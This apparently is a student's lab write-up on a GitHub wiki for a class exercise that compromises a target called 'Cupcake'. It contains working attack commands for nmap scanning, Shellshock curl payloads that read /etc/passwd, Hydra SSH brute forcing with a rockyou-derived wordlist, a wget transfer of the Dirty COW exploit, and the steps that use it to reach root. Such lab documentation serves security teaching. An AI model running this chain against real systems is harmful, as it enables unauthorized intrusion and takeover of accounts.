Activity 4.1 Exploiting Cupcake - morgan-hanrahan/Tech-Journal GitHub Wiki
Determining Versions of Services
To determine the version of the services running on the target system, you can simply just use an Nmap scan. For this example we used:
sudo nmap -A 10.0.5.23
With the -A flag we will get all of the output possible, which will include the version of the services running. In this case, we could determine the system was running OpenSSH 5.3 and Apache HTTPd 2.2.15.
Parsing NMAP with nmaptocsv
Firstly, install nmaptocsv using the following commands:
sudo apt updatesudo apt install python3-pipsudo pip install nmaptocsv
Next run the following command to scan your target and get the port information.
TARGET=10.0.5.23; sudo nmap -sT -sV --top-ports=100 $TARGET -Pn -oG top100.txtcat top100.txtnmaptocsv -i top100.txt -d ','
Copy the output of the last command and paste it into a spreadsheet. The spreadsheet will then prompt you to split the data into different columns.
Invoking Remote Code Execution
Command to output the contents of /etc/passwd:
curl -H 'User-Agent: () { :; }; echo ; echo ; /bin/cat /etc/passwd' bash -s :'' http://10.0.5.23/cgi-bin/status
Command to output the code behind the status cgi:
curl -H 'User-Agent: () { :; }; echo ; echo ; /bin/cat status' bash -s :'' http://10.0.5.23/cgi-bin/status
Command to output the results of running ifconfig:
curl -H 'User-Agent: () { :; }; echo ; echo ; /sbin/ifconfig' bash -s :'' http://10.0.5.23/cgi-bin/status
Generation of Password List & SSH Bruteforce
In the previous section, we were able to get the contents of /etc/passwd. Upon examining this information we can determine what users we might be able to access. When looking at these users, focus on the ones with /home and ignore any user with /nologin. From this information, we determined our target was samwise.
We had access to a zipped file titled 'rockyou.txt', which contained a list of possible passwords and random words. We decompressed this file using gzip -d rockyou.txt. From this list we ran the command to put the contents that contained samwise into a new file:
cat /usr/share/wordlists/rockyou.txt | grep -i "samwise" >> passwdlist.txt
The passwd.txt file now contains a list of likely passwords for the target account and we can now use bruteforce to attack cupcake. For this example we used Hydra, a tool for testing a variety of passwords against a service. We can do this attack by running:
hydra -l samwise -P passwdlist.txt 10.0.5.23 -t 4 ssh
The result of this command will provide us with samwise's password. Now that we have both the username and password we can ssh in using ssh [email protected].
Transferring Files
To transfer files between your machine and your targets you can run two commands. The first on your own:
python3 -m http.server 8084- Can pick any high port number doesn't have to be 8084
On the target's machine enter the following command:
wget http://10.0.99.39:8084/40839.c- Replace the IP with your machines IP and make sure the port is the same one from the previous command
- This will take the 40839.c file from your machine and transfer to the targets
Compiling & Running Privilege Escalation
Now to run the exploit use: gcc 40839.c -o cow. To fix the errors add the flags: -l pthread -lcrypt. Next you can run ./cow. This should successfully back up /etc/passwd to /tmp/passwd.bak and you can enter a new password. Then you can get to superuser using su - firefart and run commands with root privilege.
Reflection
This activity was fairly easy to follow along with and troubleshoot minor errors. My group worked well together and anytime I got confused my group did a great job explaining it to me. After doing this activity, I am going to research more about different exploits and how to know which ones are best to use at my current level.